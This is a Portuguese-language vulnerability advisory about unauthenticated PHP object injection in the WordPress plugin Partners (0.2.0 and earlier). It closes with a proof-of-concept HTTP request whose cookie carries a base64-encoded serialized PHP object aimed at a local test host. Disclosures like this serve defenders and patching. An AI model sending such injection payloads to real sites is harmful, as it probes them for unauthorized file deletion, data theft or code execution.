
Partners <= 0.2.0 - Injeção de Objeto PHP Não Autenticada
Partners <= 0.2.0 - Injeção de Objeto PHP não Autenticada
O plugin Partners para WordPress é vulnerável a Injeção de Objeto PHP em versões até, e incluindo, 0.2.0, por meio da desserialização de entrada não confiável. Isso torna possível que atacantes não autenticados injetem um Objeto PHP. Nenhuma cadeia POP conhecida está presente no software vulnerável. Se uma cadeia POP estiver presente por meio de um plugin ou tema adicional instalado no sistema de destino, isso pode permitir que o atacante exclua arquivos arbitrários, recupere dados confidenciais ou execute código.
GET /partners/ HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: mighty_partners_login=TzoyMDoiUEhQX09iamVjdF9JbmplY3Rpb24iOjA6e30=